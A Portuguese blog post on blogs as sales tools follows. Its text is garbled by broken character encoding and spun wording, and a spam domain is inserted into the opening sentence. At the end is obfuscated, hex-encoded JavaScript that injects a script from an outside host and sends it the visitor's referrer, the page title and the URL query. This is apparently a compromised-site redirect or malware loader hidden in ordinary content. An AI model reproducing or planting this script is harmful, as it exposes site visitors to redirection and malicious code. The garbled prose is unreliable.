Blog

Blogs E Vendas: Uma Parceria De NegA?cio Natural ?

Como personalinjury-solicitors.com vocA? pode inventar, uma de principais razA�es pelas quais as companhias consideram estes blogs eficientes como ferramentas de negA?cios A� que elas auxiliam a ocasionar ou promover as vendas. Embora nA?o haja um valor quantitativo com relaA�A?o A� mais valia monetA?ria exata dos blogs sobre as vendas, hA? evidA?ncias de algum tipo de retorno sobre o investimento. O aumento nas vendas tA?m a possibilidade de ser e geralmente A� especialmente um dos efeitos indiretos dos blogues de sucesso.

Blogs – bom para os negA?cios

Imagine sentar em frente ao seu computador com milhA�es de pessoas (acionistas, parceiros de negA?cios, concorrentes, funcionA?rios e a mA�dia) conversando a respeito de negA?cios e afins. Agora imagine se vocA? pode usar praticamente as informaA�A�es que o visitante aprendeu para estabelecer este produto ou serviA�o de que seus clientes querem, por que eles querem, como eles querem e quanto eles estA?o dispostos a pagar por isso. Isto foi precisamente este que foi um blogue e muito mais. Definitivamente, os blogues sA?o bons para as empresas.

Um blogue ou um blog A� especialmente um site interativo que mantA�m uma crA?nica contA�nua de informaA�A�es. A� um site atualizado regularmente com links para outros artigos ou outros sites. Usualmente, um blogue tende a ter uma A?rea por conteA?do principal com artigos chamados postagens ou entradas listadas em ordem cronolA?gica inversa com as muito mais recentes no topo. Usualmente, esses artigos sA?o organizados em classes. HA? tambA�m um arquivo de artigos baseado em datas. 1 blogroll, uma lista por links para outros sites relacionados A� especialmente outra caracterA�stica de 1 blog.

Um blogue pode conter um ou mais feeds. A maioria destes blogs publica feeds (RSS, RDF, Atom). Um feed A� 1 conteA?do legA�vel por mA?quina que foi atualizado periodicamente. Um leitor de feeds exibe a nova postagem e um link para ela. A maior parte dos blogs tambA�m tem um recurso que permite aos visitantes deixar comentA?rios. Com um blog, o visitante publica novos conteA?dos e seus leitores podem juntar seus prA?prios comentA?rios com links para seus prA?prios blogs. FA?cil de utilizar ferramentas por blogs estA?o disponA�veis, muitas vezes de graA�a. Uma ferramenta bA?sica de blogging fornece uma interface onde o visitante pode labutar de forma fA?cil e intuitiva como cuida do restante da logA�stica envolvida em tornar seu blog apresentA?vel e disponA�vel para o pA?blico.

Blogar, criar ou manter um blog foi uma de A?reas por rA?pido aumento da Internet. De convA�nio com o popular motor de parecer Technorati, existem mais de 40 milhA�es de blogs na Net hoje em dia e mais blogs estA?o aparecendo na taxa de 75. 000 diA?riamente. Isto A� principalmente por motivos de aos inA?meros benefA�cios de blogs para negA?cios.

Um blogue tem uma poderosa propriedade de marketing para expandir seus negA?cios, seja ele pequeno ou grande. Doravante vocA? pode ter uma presenA�a predominador na Web, nA?o baseada em tamanho, capital ou recursos, contudo baseada na qualidade de conteA?do, pA?blico-alvo e produtos e serviA�os A?teis. Com blogs como equalizadores, a blogosfera se tornou um campo de jogo verdadeiramente estimulante para todas as empresas.

Um blogue A� uma fonte constante de informaA�A�es valiosas e atualizadas. A criaA�A?o de um blog permite de que vocA? demonstre sua experiA?ncia e se estabeleA�a tais como um lA�der de ideias em seu setor. Um blog pode ser seu veA�culo para atualizaA�A�es de suplementos alimentares ou serviA�os, notA�cias da empresa e qualquer outra informaA�A?o que vocA? queira transmitir ao seu pA?blico-alvo. Um blogue deve atalhar informaA�A�es relevantes, nA?o somente arremessos de vendas; caso contrA?rio, A� especialmente muito menos provA?vel que os leitores retornem. Tais como acontece com qualquer parte de um plano do marketing da empresa, um blog deve conter informaA�A�es que atraiam seu pA?blico-alvo.

Um blogue A� um mA�todo eficaz para se comunicar usando clientes e prospects. Ele permite que vocA? converse abertamente e regularmente usando eles, aumentando a credibilidade, criando confianA�a e formando relacionamentos usando eles a partir de o inA�cio. Um blogue com seu estilo por conversaA�A?o foi ideal para desenvolver bons relacionamentos usando os clientes. Os leitores sentir-se-A?o desembaraA�ado consigo bastante antes de telefonarem-lhe para criar uma adquire ou confinar o seu serviA�o.

Um blogue A� uma A?tima ferramenta para adquirir feedback dos leitores. Seus leitores podem deixar comentA?rios ou realizar perguntas. Um blog A� especialmente uma A?tima maneira por descobrir o que os leitores estA?o pensando e no processo fornece idA�ias ou tais como melhor atendA?-los, melhorando nesse caso o seu negA?cio. Formar decisA�es de negA?cios usando base nos feedbacks dos leitores pode ser 1 dos movimentos mais hA?beis que vocA? pode fazer.

No entanto, para ser eficaz, um blog tem que ser atualizado usando freqA?A?ncia. Os leitores nA?o visitam blogues que nA?o apresentam novos conteA?dos regularmente. Manter estes leitores informados com postagens periA?dicas a cerca de o seu negA?cio cria buzz e publicidade. Existe trabalho envolvido na criaA�A?o de um blog. Leva tempo e compromisso para escrever posts interessantes e informativos. Mas pode ser bem gasto, especialmente se ajudar a gerar vendas.

Blogues e Vendas Em Tandem

As vendas exigem interaA�A?o privada. Um blog A� um desses lugares onde a comunicaA�A?o atravA�s de conversas prospera e os relacionamentos sA?o fomentados. Quando vocA? dA? aos seus leitores informaA�A�es importantes que eles podem vir a usar atravA�s do seu blog de maneira consistente, eles ficarA?o satisfeitos. Em seguida, eles retornarA?o para mais conteA?do fresco regularmente. Horas extras, vocA? serA? capaz de obter um pA?blico fiel. Os leitores vA?o vA?-lo como um especialista em seu nicho especA�fico. Seus leitores vA?o confiar em vocA? e um relacionamento A� progredido. Seus leitores perceberA?o que A� menos arriscado comprar de vocA? ou emanar seu serviA�o. Se vocA? pode blogar eficientemente a cerca de o tema, eles tendem a acreditar que seu produto ou serviA�o valerA? a penudo.

Ao blogar, vocA? estA? enviando a mensagem de que alguA�m estA? ouvindo, alguA�m que vocA? pode abordar como pode ser visto a partir do comentA?rios respondidos e novas atualizaA�A�es. Isso farA? usando que seus leitores se sintam muito mais seguros e levarA? isso em consideraA�A?o, pois eles tomam uma decisA?o de compra. Este blog A� inerentemente uma conversa contA�nua que, a longo prazo, gera confianA�a e lealdade e proporciona familiaridade. Quando eles se tornarem clientes satisfeitos, eles virA?o atA� mesmo vocA? para obter ainda mais informaA�A�es e, se receberem a opA�A?o, desejarA?o comprar de vocA?. Isso fortalece o relacionamento entre o visitante e seus clientes e eles igualmente podem enviar outras vendas para vocA?. O ciclo continua. AlA�m disso, 1 blog A� especialmente uma forma extremamente eficiente para adquirir um ranking elevado do Search Engine. Em outras palavras, os blogs podem trazer ainda mais leitores e mais compradores em potencial.

Blogar A� especialmente marketing para as pessoas do uma maneira menos intrusiva e ofensiva, mais tais como uma conversa freewheeling em comparaA�A?o com um discurso de vendas irritante. A� realmente uma boa forma de estimular as vendas, ainda que indiretamente.

var _0xb322=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}